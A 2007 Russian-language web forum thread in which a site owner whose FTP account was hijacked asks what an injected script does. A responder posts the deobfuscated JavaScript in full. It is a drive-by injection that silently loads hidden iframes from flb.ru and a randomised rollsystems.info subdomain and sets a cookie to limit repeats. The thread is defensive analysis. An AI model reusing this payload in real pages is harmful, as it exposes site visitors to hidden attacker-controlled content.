Зловредный скрипт - ЧТО ОН МОГ ДЕЛАТЬ? / HTML, JavaScript, VBScript, CSS

ReSQL.ru

Мобильная версия Контакт Правила FAQ Помощь

Гость

Войти | Регистрация | Профиль | Очистить

Новые сообщения | Избранное

Форумы | Пользователи | Статистика | Мод. лог | Поиск

Цитировать

Написать

Автор*:

Ввести пароль для входа

Тема*:

Сообщение

Данное сообщение тематическое

Сообщение содержит картинки или видео 18+

Автор:

ВНИМАНИЕ! На данном подфоруме действуют строгие правила. Удостоверьтесь, что ваше сообщение соответствует им!

Форум или тема закрыты для гостей. Необходима авторизация!

Загрузить последнюю сохраненную версию

Вложение:

Вставить как галерею

Максимальный размер вложений: 4,0 МБ, аудио/видео: 8,0 МБ. Картинки большего размера ужимаются, если возможно.

Введите код, изображенный на картинке. Если код нечитаемый, кликните картинку, чтобы загрузить другой вариант.

Отправляя сообщение, я выражаю свое согласие с правилами форума и принимаю пользовательское соглашение.

Доб. в избранное | Игнор. тему | Прикреп. тему | Пометить прочит. / непрочит. | Фильтр

Форумы / HTML, JavaScript, VBScript, CSS [игнор отключен] [закрыт для гостей] / Зловредный скрипт - ЧТО ОН МОГ ДЕЛАТЬ?

12 сообщений из 12, страница 1 из 1

Зловредный скрипт - ЧТО ОН МОГ ДЕЛАТЬ?

#34465685

SQLWalker

Гость

Пару дней назад некий хакер пока неизвестным мне способом получил пароль на мой
ftp и к тексту некоторых страниц добавил некий скрипт. При открытии страницы у меня выскакивала ошибка "Приложение C:\Windows\oft.exe не является Win32 приложением".
В каталоге C:\Windows я обнаруживал пустой файл со случайным именем и расширением exe.
Кроме этого скрипт что-то отсылал например на узел flb.ru

Кто может по этому скрипту сказать о его действиях?

...

Рейтинг:

0 / 0

17.04.2007, 11:17

| Ответить | Цитировать | Написать

Зловредный скрипт - ЧТО ОН МОГ ДЕЛАТЬ?

#34465700

SQLWalker

Гость

Я скрипт прикрепил, а его нет. Пробую еще раз

...

Рейтинг:

0 / 0

17.04.2007, 11:19

| Ответить | Цитировать | Написать

Зловредный скрипт - ЧТО ОН МОГ ДЕЛАТЬ?

#34465880

Antonariy

Участник

Откуда: ☭

Сообщения: 80 221

Рейтинг: 0 / 0

Если снять обфускацию, то брюки превращаются...
<script language="javascript">
setTimeout(wfsw, 100);
setTimeout(wfsw, 1000);
setTimeout(wfsw, 2000);
setTimeout(wfsw, 3000);
setTimeout(wfsw, 4000);
setTimeout(wfsw, 5000);
setTimeout(function(){wfsw(true);}, 300);
setTimeout(function(){wfsw(true);}, 1200);
setTimeout(function(){wfsw(true);}, 2400);
setTimeout(function(){wfsw(true);}, 3600);
setTimeout(function(){wfsw(true);}, 4600);
setTimeout(function(){wfsw(true);}, 6000);
function wfsw(w){
var url,o;
url="http://" + (w ? "www." : "") + "flb.ru/info/"+Math.ceil(20000+Math.random()*22000)+".html";
o = document.createElement("iframe");
try { o.src=url;}
catch(e){o.setAttribute("src",url);}
o.style.display = "none";
o.style.width = "1px";
o.style.height = "1px";
o.frameBorder=0;
try { document.body.appendChild(o); }
catch(e){}
}

var cn = "sr0lfc";
var cv = "1";
var se = "s1.rollsystems.info";
var p = "/html/";

if(document.cookie.indexOf(cn+"="+cv) == -1){
var url = "http://" + (document.location.host != "" ? "" : rsys_rs()) + document.location.host.replace(/[^a-z0-9.-]/, ".").replace(/\.+/, ".") + "." + rsys_rs() + "." + se + p;
var o = document.createElement("iframe");
o.setAttribute("src", url);
o.frameBorder=1;
o.width=1;
o.height=1;
o.style.display="none";
try { document.body.appendChild(o); rsys_sc(cn,cv);}
catch(e){}
}
function rsys_rs(){
var l=48, c="01234567890abcdef", o="";
for(i=0; i < l; i++) o += c.substr(Math.floor(Math.random()*c.length),1,1);
return o;
}

function rsys_sc(cn,cv){
var t= new Date();
var e= new Date();
e.setTime(t.getTime()+3600000*24);
document.cookie = cn+"="+escape(cv)+";
expires="+e.toGMTString();
}
</script>Дальше думать лень...

...

Рейтинг:

0 / 0

17.04.2007, 11:54

| Ответить | Цитировать | Написать

Зловредный скрипт - ЧТО ОН МОГ ДЕЛАТЬ?

#34465925

Antonariy

Участник

Откуда: ☭

Сообщения: 80 221

Рейтинг: 0 / 0

По-моему это банальная раскрутка сайта флб.ру

...

Рейтинг:

0 / 0

17.04.2007, 12:05

| Ответить | Цитировать | Написать

Зловредный скрипт - ЧТО ОН МОГ ДЕЛАТЬ?

#34465966

Antonariy

Участник

Откуда: ☭

Сообщения: 80 221

Рейтинг: 0 / 0

Советую обратить внимание на сайт s1.rollsystems.info - яндекс первой же ссылкой выдал вот это .

ip этого сайта - 83.136.26.157, whois выдал такую инфу:

Код: plaintext

1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
22.
23.
24.
25.
26.
27.
28.
29.
30.
31.
32.
33.
34.
35.
36.
37.
38.
39.
40.
41.
42.

inetnum:   83.136.26.0 - 83.136.26.255 
netname:   MTU-INFORM-NETWORK 
descr:    MTU-Inform company 
country:   RU 
admin-c:   MIKE7-RIPE 
admin-c:   DIMA1-RIPE 
tech-c:    MIKE7-RIPE 
tech-c:    DIMA1-RIPE 
status:    ASSIGNED PA 
mnt-by:    MTU-INFORM-MNT 
mnt-lower:  MTU-INFORM-MNT 
mnt-routes:  MTU-INFORM-MNT 
source:    RIPE # Filtered 

person:     Mikhail K Grachikov 
address:    MTU-Inform 
address:    Smolenskaya-Sennaya Sq., 27, bld. 2 
address:    119121, Moscow, 
remarks:    phone:    +7 095 2587886 
phone:     +7 495 2587886 
remarks:    ------------------------------------------------ 
remarks:    Please send abuse reports to  
remarks:    ------------------------------------------------ 
e-mail:      
nic-hdl:    MIKE7-RIPE 
mnt-by:     MTU-INFORM-MNT 
source:     RIPE # Filtered 
remarks:    modified for Russian phone area changes 

person:     Dmitri A Kravtsov 
address:    MTU-Inform 
address:    Smolenskaya-Sennaya Sq., 27, bld. 2 
address:    119121, Moscow, 
remarks:    phone:    +7 095 7213475 
phone:     +7 495 7213475 
e-mail:      
remarks:    ------------------------------------------------ 
remarks:    Please send abuse reports to  
remarks:    ------------------------------------------------ 
nic-hdl:    DIMA1-RIPE 
mnt-by:     MTU-INFORM-MNT 
source:     RIPE # Filtered 
remarks:    modified for Russian phone area changes

Можно обратиться к указанным товарищам...

...

Рейтинг:

0 / 0

17.04.2007, 12:12

| Ответить | Цитировать | Написать

Зловредный скрипт - ЧТО ОН МОГ ДЕЛАТЬ?

#34465983

SQLWalker

Гость

AntonariyЕсли снять обфускацию...

Это уже кое-что. Спасибо. А как Вы сняли обфускацию ?

...

Рейтинг:

0 / 0

17.04.2007, 12:15

| Ответить | Цитировать | Написать

Зловредный скрипт - ЧТО ОН МОГ ДЕЛАТЬ?

#34465997

Antonariy

Участник

Откуда: ☭

Сообщения: 80 221

Рейтинг: 0 / 0

Вместо document.write(FZ); написал

Код: plaintext

1.
2.
3.

	var fso=new ActiveXObject("Scripting.FilesystemObject");
	var ts = fso.OpenTextFile("out.txt", 2 ,true);
	ts.write(FZ);
	ts.close();

и выполнил скрипт. Он содержит функцию расшифровки массива.

...

Рейтинг:

0 / 0

17.04.2007, 12:18

| Ответить | Цитировать | Написать

Зловредный скрипт - ЧТО ОН МОГ ДЕЛАТЬ?

#34466015

SQLWalker

Гость

AntonariyСоветую обратить внимание на сайт s1.rollsystems.info - яндекс первой же ссылкой выдал вот это .

ip этого сайта - 83.136.26.157, whois выдал такую инфу:
Можно обратиться к указанным товарищам...

Про ip адрес мне еще вчера сказал хостинг-провайдер - именно с этого адреса зашли по ftp и добавили скрипт. Но как они слили мои ftp пароли, пока не могу понять. Установлены и постоянно апдейтятся Outpost & NOD32.

Спасибо за инфу по rollsystems.info/html. Вот гады.

...

Рейтинг:

0 / 0

17.04.2007, 12:21

| Ответить | Цитировать | Написать

Зловредный скрипт - ЧТО ОН МОГ ДЕЛАТЬ?

#34478159

Ferrari8246

Участник

Сообщения: 404

Рейтинг: 0 / 0

пароли елементарно.
програмамми или шпионами.
чем угодно и как угодно.

...

Рейтинг:

0 / 0

21.04.2007, 18:45

| Ответить | Цитировать | Написать

Зловредный скрипт - ЧТО ОН МОГ ДЕЛАТЬ?

#34478266

WEB_bobby

Участник

Сообщения: 393

Рейтинг: 0 / 0

Зы так а вы не в курсе? В сети новый вирь!
Просвещаемся: >>>>

...

Рейтинг:

0 / 0

21.04.2007, 21:06

| Ответить | Цитировать | Написать

Зловредный скрипт - ЧТО ОН МОГ ДЕЛАТЬ?

#34484172

John12

Гость

Антивирус касперского его дерет, просто установи себе на комп с базами апдейта на 19 апреля 07
и версия AVP 4,5 =)
Удачи

...

Рейтинг:

0 / 0

24.04.2007, 16:53

| Ответить | Цитировать | Написать

Зловредный скрипт - ЧТО ОН МОГ ДЕЛАТЬ?

#34484195

John12

Гость

Привет ребят!!!
Ребята мне надо скрипт (VBS) или JS.
Надо чтобы с фтп мона было закачивать с UpLoadom списки файлов и проверять
дату их изменения, но причем чтобы скрипт не пользовался файлом ftp.exe а под виндой XP выполнял стандартные комнды скриптов.
Если это мона сделать через библиотеку (WinInet) то напишите пример как ато чет у меня
не получается ее подключить +)
Пожалуйсто хелпните меня =)
Репка вам++

...

Рейтинг:

0 / 0

24.04.2007, 16:58

| Ответить | Цитировать | Написать

12 сообщений из 12, страница 1 из 1

Форумы / HTML, JavaScript, VBScript, CSS [игнор отключен] [закрыт для гостей] / Зловредный скрипт - ЧТО ОН МОГ ДЕЛАТЬ?

Читали тему (0):

Читали форум (0):

Пользователи онлайн (0):

start [/forum/topic.php?fid=22&msg=34465925&tid=1458408]:	0ms
get settings:	10ms
get forum list:	14ms
check forum access:	3ms
check topic access:	3ms
track hit:	45ms
get topic data:	13ms
get forum data:	3ms
get page messages:	53ms
get tp. blocked users:	2ms
others:	232ms

total:	378ms